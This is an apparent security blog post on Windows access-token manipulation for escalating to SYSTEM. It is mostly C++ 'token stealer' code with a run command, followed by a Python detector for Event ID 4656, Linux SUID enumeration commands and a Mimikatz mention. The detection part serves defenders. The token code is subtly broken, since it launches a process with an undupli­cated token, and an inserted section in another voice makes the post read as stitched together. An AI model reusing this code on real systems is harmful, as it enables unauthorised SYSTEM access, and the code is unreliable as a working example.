2025-02-15
Elevating privileges from a user to an administrator level is challenging, but escalating from an administrator to SYSTEM level is even more complex. One effective method for this is the Access Token Manipulation Attack. When you log into a Windows machine, the system creates a token containing your security identifier (SID), discretionary access control list (DACL), logon sessions, and other details. By manipulating this token, you can escalate privileges.
I’ve developed a program to demonstrate this attack. Below are the key functions and commands used:
Key Functions:
- BOOL SetPrivilege(LPCTSTR priv): Enables specific privileges like `SE_DEBUG_NAME` for the current process.
- HANDLE GetToken(DWORD pid): Retrieves the access token from a target process using its Process ID (PID).
- BOOL CreateElevatedProcess(HANDLE token, LPCWSTR appPath): Creates a new process using a duplicated token.
Code Snippet:
```cpp
#include <windows.h>
#include <iostream>

// Enables a named privilege (for example SE_DEBUG_NAME) in the current process token.
BOOL SetPrivilege(LPCTSTR priv) {
    HANDLE hToken;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return FALSE;
    TOKEN_PRIVILEGES tkp;
    if (!LookupPrivilegeValue(NULL, priv, &tkp.Privileges[0].Luid))
        return FALSE;
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, NULL);
    return GetLastError() == ERROR_SUCCESS;
}

// Opens the access token of the process identified by pid.
HANDLE GetToken(DWORD pid) {
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, TRUE, pid);
    if (hProcess == NULL)
        return NULL;
    HANDLE hToken;
    if (!OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_IMPERSONATE, &hToken))
        return NULL;
    return hToken;
}

// Starts appPath using the supplied token.
BOOL CreateElevatedProcess(HANDLE token, LPCWSTR appPath) {
    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi;
    return CreateProcessAsUserW(token, NULL, appPath, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
}
```
Execution:
To execute the program, run the token stealer with the PID of any process running under SYSTEM privilege:
```
./token_stealer.exe <PID>
```
Blue Team Scenario:
As a Blue Teamer, monitor Event ID 4656 in the Windows Security log. This event is logged when a handle to an object is requested with a given access mask. An `OpenProcess()` call requesting `PROCESS_QUERY_LIMITED_INFORMATION` (access mask 0x1000) on a process running as SYSTEM is a key indicator of this attack. Note that 4656 belongs to Object Access auditing and is only written when that auditing is enabled for the object type and a SACL covers the object; the 0x1000 mask is also requested by many legitimate tools, so correlate the event with the requesting account and process name rather than alerting on the mask alone.
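As an added example of the detection side (my own code, not the post's program): a Python parser for the 4656 message body that applies the indicator above, narrowed to requesters that are not already LocalSystem. The event bodies are constructed to mirror the Security log layout; the field names are the real ones, while the SIDs, paths and PID are made up.

```python
import re

# A 4656 message body lists fields as "\tName:\t\tvalue" lines under section headers.
_FIELD_RE = re.compile(r"^\t([A-Za-z ]+):\t+(.*)$", re.MULTILINE)
LOCAL_SYSTEM_SID = "S-1-5-18"
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000  # the access mask named on the page

def make_4656_body(sid, account, obj_type, obj_name, proc_name, mask):
    """Build a constructed 4656 message body in the Security log layout (test data, not a real event)."""
    return ("A handle to an object was requested.\n"
            f"Subject:\n\tSecurity ID:\t\t{sid}\n\tAccount Name:\t\t{account}\n"
            f"Object:\n\tObject Server:\t\tSecurity\n\tObject Type:\t\t{obj_type}\n"
            f"\tObject Name:\t\t{obj_name}\n"
            f"Process Information:\n\tProcess ID:\t\t0x1a2c\n\tProcess Name:\t\t{proc_name}\n"
            f"Access Request Information:\n\tAccess Mask:\t\t{mask:#x}\n")

def parse_4656(body):
    """Return the field/value pairs of one 4656 message body (first occurrence of a name wins)."""
    fields = {}
    for name, value in _FIELD_RE.findall(body):
        fields.setdefault(name, value.strip())
    return fields

def is_suspicious_process_handle(fields):
    """Page indicator: a Process handle requested with 0x1000 in the mask, narrowed to
    requesters that are not already LocalSystem (SYSTEM querying SYSTEM is not escalation)."""
    if fields.get("Object Type") != "Process":
        return False
    mask = int(fields.get("Access Mask", "0x0"), 16)
    if not mask & PROCESS_QUERY_LIMITED_INFORMATION:
        return False
    return fields.get("Security ID") != LOCAL_SYSTEM_SID

def flag_events(bodies):
    """Parse each body and keep those matching the indicator."""
    return [f for f in map(parse_4656, bodies) if is_suspicious_process_handle(f)]

# Constructed sample events: one matching request, one from SYSTEM itself, one File handle.
SAMPLE_EVENTS = [
    make_4656_body("S-1-5-21-1111-2222-3333-1001", "alice", "Process",
                   "\\Device\\HarddiskVolume2\\Windows\\System32\\winlogon.exe",
                   "C:\\Users\\alice\\token_stealer.exe", 0x1000),
    make_4656_body(LOCAL_SYSTEM_SID, "SYSTEM", "Process",
                   "\\Device\\HarddiskVolume2\\Windows\\System32\\lsass.exe",
                   "C:\\Windows\\System32\\services.exe", 0x1000),
    make_4656_body("S-1-5-21-1111-2222-3333-1001", "alice", "File",
                   "C:\\Users\\alice\\notes.txt", "C:\\Windows\\System32\\notepad.exe", 0x120089),
]
```

Running `flag_events(SAMPLE_EVENTS)` returns only the first record; feed it the message bodies from `Get-WinEvent` to apply the same filter to real log data.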
What Undercode Say:
Privilege escalation attacks like token manipulation are critical threats in cybersecurity. Understanding both offensive and defensive techniques is essential for robust security. Here are some additional commands and tools to enhance your skills:
1. Linux Privilege Escalation:
- Use `sudo -l` to check sudo permissions.
- Enumerate SUID binaries with `find / -perm -u=s -type f 2>/dev/null`.
2. Windows Commands:
- Use `whoami /priv` to check current privileges.
- Monitor logs with `Get-WinEvent -LogName Security | Where-Object { $_.ID -eq 4656 }`.
3. Tools:
- Mimikatz: Extract tokens and credentials.
- Sysinternals Suite: Analyze processes and tokens.
4. Practice:
- Set up a lab environment using VirtualBox or VMware.
- Practice with tools like Metasploit and Cobalt Strike.
For further reading, visit:
By mastering these techniques, you can better defend against advanced attacks and strengthen your cybersecurity posture.